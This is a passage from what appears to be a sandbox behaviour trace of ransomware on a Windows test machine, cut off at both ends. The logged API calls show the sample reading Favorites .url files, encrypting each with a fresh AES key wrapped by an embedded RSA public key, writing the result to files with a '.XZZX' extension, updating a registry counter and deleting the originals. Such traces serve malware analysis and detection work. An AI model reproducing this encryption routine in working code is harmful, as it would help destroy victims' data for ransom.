dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc2 [0045.913] WriteFile (in: hFile=0x55c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.913] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc7 [0045.913] SetErrorMode (uMode=0x1) returned 0x1 [0045.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0045.913] OutputDebugStringW (lpOutputString="end") [0045.913] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0045.913] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0045.913] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5ca8) returned 1 [0045.914] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5ca8, dwCertEncodingType=0x1, pInfo=0x3e40400*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40430*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40438*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5e50) returned 1 [0045.914] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.914] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0045.914] CryptEncrypt (in: hKey=0x42e5e50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0045.914] CryptEncrypt (in: hKey=0x42e5e50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d5d30*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d5d30*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0045.915] WriteFile (in: hFile=0x55c, lpBuffer=0x42d5d30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d5d30*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0045.915] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0045.915] WriteFile (in: hFile=0x55c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.915] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0045.915] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0045.915] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x564) returned 0x0 [0045.915] RegQueryValueExW (in: hKey=0x564, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x42, lpcbData=0x417dfdc*=0x4) returned 0x0 [0045.915] RegCloseKey (hKey=0x564) returned 0x0 [0045.915] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x564) returned 0x0 [0045.915] RegSetValueExW (in: hKey=0x564, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x43, cbData=0x4 | out: lpData=0x417dfec*=0x43) returned 0x0 [0045.915] RegCloseKey (hKey=0x564) returned 0x0 [0045.915] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.916] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.916] CloseHandle (hObject=0x55c) returned 1 [0045.916] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0045.917] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0045.917] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url")) returned 1 [0045.917] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url")) returned 0 Thread: id = 162 os_tid = 0x8f8 [0045.919] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.919] lstrcpyW (in: lpString1=0x417f460, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0045.919] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0045.919] SetErrorMode (uMode=0x1) returned 0x1 [0045.919] lstrcpyW (in: lpString1=0x417f860, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0045.919] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x503ed66c, Data2=0x417, Data3=0x4522, Data4=([0]=0xa6, [1]=0x64, [2]=0x8b, [3]=0x4a, [4]=0x7c, [5]=0x5f, [6]=0x29, [7]=0xd))) returned 0x0 [0045.919] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0045.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0045.919] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned 100 [0045.919] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="XZZX") returned 0x0 [0045.919] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", dwFileAttributes=0x20) returned 1 [0045.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x560 [0045.920] ReadFile (in: hFile=0x560, lpBuffer=0x34e068, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesRead=0x417e418*=0x85, lpOverlapped=0x0) returned 1 [0045.920] CloseHandle (hObject=0x560) returned 1 [0045.920] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0045.920] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0045.921] SetErrorMode (uMode=0x1) returned 0x1 [0045.921] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0045.921] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5db8) returned 1 [0045.923] CryptGenKey (in: hProv=0x42d5db8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e4f90) returned 1 [0046.090] CryptExportKey (in: hKey=0x42e4f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0046.090] CryptExportKey (in: hKey=0x42e4f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0046.090] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.091] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0046.091] CryptDestroyKey (hKey=0x42e4f90) returned 1 [0046.091] CryptReleaseContext (hProv=0x42d5db8, dwFlags=0x0) returned 1 [0046.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\30FEF3B4011ABE0E503ED66C0532A256.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\30fef3b4011abe0e503ed66c0532a256.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0046.091] WriteFile (in: hFile=0x568, lpBuffer=0x34e068*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesWritten=0x417e438*=0x85, lpOverlapped=0x0) returned 1 [0046.092] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0046.092] WriteFile (in: hFile=0x568, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.092] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0046.092] WriteFile (in: hFile=0x568, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2a, lpOverlapped=0x0) returned 1 [0046.092] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb4 [0046.092] WriteFile (in: hFile=0x568, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.092] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb9 [0046.092] SetErrorMode (uMode=0x1) returned 0x1 [0046.092] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0046.092] OutputDebugStringW (lpOutputString="end") [0046.093] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0046.093] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0046.093] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5db8) returned 1 [0046.093] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5db8, dwCertEncodingType=0x1, pInfo=0x3e404d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40500*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40508*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e4f90) returned 1 [0046.093] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.094] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0046.094] CryptEncrypt (in: hKey=0x42e4f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0046.094] CryptEncrypt (in: hKey=0x42e4f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d5e40*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d5e40*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0046.094] WriteFile (in: hFile=0x568, lpBuffer=0x42d5e40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d5e40*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0046.094] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0046.094] WriteFile (in: hFile=0x568, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0046.094] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0046.094] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0046.094] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x56c) returned 0x0 [0046.094] RegQueryValueExW (in: hKey=0x56c, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x43, lpcbData=0x417dfdc*=0x4) returned 0x0 [0046.095] RegCloseKey (hKey=0x56c) returned 0x0 [0046.095] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x56c) returned 0x0 [0046.095] RegSetValueExW (in: hKey=0x56c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x44, cbData=0x4 | out: lpData=0x417dfec*=0x44) returned 0x0 [0046.095] RegCloseKey (hKey=0x56c) returned 0x0 [0046.095] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.095] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.095] CloseHandle (hObject=0x568) returned 1 [0046.096] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0046.097] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0046.097] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url")) returned 1 [0046.097] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url")) returned 0 Thread: id = 163 os_tid = 0x914 [0046.098] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.098] lstrcpyW (in: lpString1=0x42cf460, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0046.098] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0046.098] SetErrorMode (uMode=0x1) returned 0x1 [0046.098] lstrcpyW (in: lpString1=0x42cf860, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0046.098] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x2377d2fd, Data2=0x887b, Data3=0x4ccc, Data4=([0]=0xb9, [1]=0x61, [2]=0xed, [3]=0x2f, [4]=0x56, [5]=0x30, [6]=0x27, [7]=0xa3))) returned 0x0 [0046.098] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0046.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0046.098] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned 100 [0046.098] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="XZZX") returned 0x0 [0046.098] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", dwFileAttributes=0x20) returned 1 [0046.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0046.099] ReadFile (in: hFile=0x55c, lpBuffer=0x34e188, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x34e188*, lpNumberOfBytesRead=0x42ce418*=0x85, lpOverlapped=0x0) returned 1 [0046.099] CloseHandle (hObject=0x55c) returned 1 [0046.099] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0046.100] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0046.100] SetErrorMode (uMode=0x1) returned 0x1 [0046.100] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0046.100] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5ec8) returned 1 [0046.102] CryptGenKey (in: hProv=0x42d5ec8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5d10) returned 1 [0046.199] CryptExportKey (in: hKey=0x42e5d10, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0046.199] CryptExportKey (in: hKey=0x42e5d10, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0046.199] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.200] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0046.200] CryptDestroyKey (hKey=0x42e5d10) returned 1 [0046.200] CryptReleaseContext (hProv=0x42d5ec8, dwFlags=0x0) returned 1 [0046.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\b2a8c78f28f146042377d2fd2d1e2a4c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0046.201] WriteFile (in: hFile=0x55c, lpBuffer=0x34e188*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x34e188*, lpNumberOfBytesWritten=0x42ce438*=0x85, lpOverlapped=0x0) returned 1 [0046.201] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0046.201] WriteFile (in: hFile=0x55c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0046.201] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0046.201] WriteFile (in: hFile=0x55c, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x2a, 